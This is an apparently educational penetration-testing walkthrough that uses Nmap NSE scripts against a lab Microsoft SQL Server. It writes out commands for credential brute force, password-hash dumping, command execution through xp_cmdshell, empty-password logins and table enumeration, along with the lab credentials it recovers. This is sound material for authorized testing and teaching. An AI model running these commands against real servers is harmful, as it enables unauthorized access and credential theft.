MSSQL Penetration Testing:Nmap

To obtain basic information such as database names, usernames, names of tables, etc from the SQL servers on the Windows operating system, we will execute penetration testing using Nmap scripts. MSSQL is Microsoft SQL Server for database management in the network. By default, it runs on port 1433. In our previous article, we had set up a Microsoft SQL Server in Windows 10.

Table of Content

·         Requirement

·         Enumerating version

·         Credential Brute Force

·         Execute SQL Query

·         NetBIOS Enumeration

·         MS-SQL Password Hash Dump

·         Exploit XP_cmdshell Function

·         Test Empty Password Login

·         Enumerate Database Tables

 

Requirement

Attacker: Kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

 

Nmap is a collection of Lua-based NSE scripts that conduct authentication and unauthenticated penetration testing on MS-SQL port 1433. The NSE script for MS-SQL may be identified using the instructions below.

locate *.nse | grep ms-sql

Enumerating version

This Script will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 --script ms-sql-info 192.168.1.146

Credential Brute Force

Performs brute-force password auditing against Ms-SQL servers and connection timeout (default: “5s”). All we need are dictionaries for usernames and passwords, which will be passed as arguments.

nmap -p1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.146

In the image you can observe that we had successfully retrieve credentials for three users:

Username: pavan and password:Password@123

Username: aarti and password:Password@123

Username: sa and password: Password@1

 

Execute SQL Query

Once you have retrieved the login credential use these credentials in the NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL Server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-query.query="sp_databases" 192.168.1.146

NetBIOS Enumeration

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with an NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

nmap -p1433 --script ms-sql-ntlm-info 192.168.1.146

 

MS-SQL Password Hash Dump

 

The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. To do so, the user needs to have the appropriate DB privileges.

nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146

From the given image you can observe that it has dumped the hash value of passwords of the user: sa which we have enumerated above.

Exploit XP_cmdshell Function

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. By default, the xp_cmdshell option is disabled. NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in the targeted server

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.146

From the depicted image you can perceive the output for the “net user” command.

Test Empty Password Login

If the administrator of Microsoft-SQL Server left the password blank for login, the attacker can direct login into the database server; as shown in the image below, we are investigating the property of a user's account "sa."

Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p1433 --script ms-sql-empty-password 192.168.1.146

We had successfully logged in with user: sa and an empty password, as you can see in the screenshot below.

Enumerate Database Tables

The following command will attempt to fetch a list of tables from inside the Microsoft SQL server bypassing login credentials as an argument through Nmap script.

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146